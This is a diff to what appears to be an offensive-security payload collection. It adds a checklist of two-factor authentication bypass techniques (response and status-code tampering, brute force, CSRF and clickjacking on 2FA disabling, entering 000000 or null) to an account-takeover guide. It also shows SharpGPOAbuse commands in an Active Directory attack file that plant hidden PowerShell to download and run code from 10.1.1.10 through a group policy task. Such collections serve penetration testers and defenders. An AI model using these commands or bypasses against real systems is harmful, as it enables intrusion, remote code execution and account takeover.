Office Attacks

Account Takeover/README.md

@@ -13,6 +13,20 @@
 * [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
 * [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
 * [Account Takeover via CSRF](#account-takeover-via-csrf)
+* [2FA Bypasses](#2fa-bypasses)
+    * [Response Manipulation](#reponse-manipulation)
+    * [Status Code Manipulation](#status-code-manipulation)
+    * [2FA Code Leakage in Response](#2fa-code-leakage-in-response)
+    * [JS File Analysis](#js-file-analysis)
+    * [2FA Code Reusability](#2fa-code-reusability)
+    * [Lack of Brute-Force Protection](#lack-of-brute-force-protection)
+    * [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation)
+    * [CSRF on 2FA Disabling](#csrf-on-2fa-disabling)
+    * [Password Reset Disable 2FA](#password-reset-disable-2fa)
+    * [Backup Code Abuse](#backup-code-abuse)
+    * [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
+    * [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
+    * [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
 * [References](#references)
 
 ## Password Reset Feature
@@ -152,6 +166,63 @@ JSON Web Token might be used to authenticate an user.
 * Edit the JWT with another User ID / Email
 * Check for weak JWT signature 
 
+## 2FA Bypasses
+
+### Response Manipulation
+
+In response if `"success":false`
+Change it to `"success":true`
+
+### Status Code Manipulation
+
+If Status Code is **4xx**
+Try to change it to **200 OK** and see if it bypass restrictions
+
+### 2FA Code Leakage in Response
+
+Check the response of the 2FA Code Triggering Request to see if the code is leaked.
+
+### JS File Analysis
+
+Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
+
+### 2FA Code Reusability
+
+Same code can be reused
+
+### Lack of Brute-Force Protection
+
+Possible to brute-force any length 2FA Code
+
+### Missing 2FA Code Integrity Validation
+
+Code for any user acc can be used to bypass the 2FA
+
+### CSRF on 2FA Disabling
+
+No CSRF Protection on disabling 2FA, also there is no auth confirmation
+
+### Password Reset Disable 2FA
+
+2FA gets disabled on password change/email change
+
+### Backup Code Abuse
+
+Bypassing 2FA by abusing the Backup code feature
+Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
+
+### Clickjacking on 2FA Disabling Page
+
+Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
+
+### Enabling 2FA doesn't expire Previously active Sessions
+
+If the session is already hijacked and there is a session timeout vuln
+
+### Bypass 2FA with null or 000000
+Enter the code **000000** or **null** to bypass 2FA protection.
+
+
 ## TODO
 
 * Broken cryptography

Methodology and Resources/Active Directory Attack.md

@@ -726,6 +726,7 @@ $ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\
 .\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
 
 # Configuring a Computer or User Immediate Task
+# /!\ Intended to "run once" per GPO refresh, not run once per system
 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
 .\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments  "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force
 ```